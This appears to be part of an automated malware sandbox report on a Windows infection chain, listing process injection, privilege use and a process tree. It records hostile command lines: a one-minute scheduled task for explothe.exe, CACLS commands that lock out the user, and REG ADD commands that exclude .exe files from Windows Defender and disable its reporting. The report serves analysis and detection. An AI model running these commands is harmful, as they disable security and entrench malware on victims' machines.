Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A118.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5BC1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\bcdedit.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2316 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1224 wrote to memory of 2736 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E7B0.exe
PID 1224 wrote to memory of 2736 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E7B0.exe
PID 1224 wrote to memory of 2736 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E7B0.exe
PID 1224 wrote to memory of 2736 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E7B0.exe
PID 1224 wrote to memory of 2736 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E7B0.exe
PID 1224 wrote to memory of 2736 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E7B0.exe
PID 1224 wrote to memory of 2736 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E7B0.exe
PID 1224 wrote to memory of 2772 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E8BB.exe
PID 1224 wrote to memory of 2772 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E8BB.exe
PID 1224 wrote to memory of 2772 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E8BB.exe
PID 1224 wrote to memory of 2772 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E8BB.exe
PID 2736 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2736 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2736 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2736 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2736 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2736 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2736 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 1224 wrote to memory of 2980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 2980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 2980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 1224 wrote to memory of 1868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EB5B.exe
PID 1224 wrote to memory of 1868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EB5B.exe
PID 1224 wrote to memory of 1868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EB5B.exe
PID 1224 wrote to memory of 1868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EB5B.exe
PID 2580 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2580 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2580 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2580 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2580 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2580 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2580 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2576 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2576 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2576 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2576 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2576 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2576 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 2576 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 1224 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EEE5.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe

"C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\E7B0.exe

C:\Users\Admin\AppData\Local\Temp\E7B0.exe

C:\Users\Admin\AppData\Local\Temp\E8BB.exe

C:\Users\Admin\AppData\Local\Temp\E8BB.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\E9F4.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\EB5B.exe

C:\Users\Admin\AppData\Local\Temp\EB5B.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\EEE5.exe

C:\Users\Admin\AppData\Local\Temp\EEE5.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\F5B9.exe

C:\Users\Admin\AppData\Local\Temp\F5B9.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\9247.exe

C:\Users\Admin\AppData\Local\Temp\9247.exe

C:\Users\Admin\AppData\Local\Temp\9766.exe

C:\Users\Admin\AppData\Local\Temp\9766.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\A118.exe

C:\Users\Admin\AppData\Local\Temp\A118.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\7zSB1B3.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp" /SL4 $A0194 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Windows\system32\taskeng.exe

taskeng.exe {4D98A719-9564-4F8B-BAFA-DF868310DE3D} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

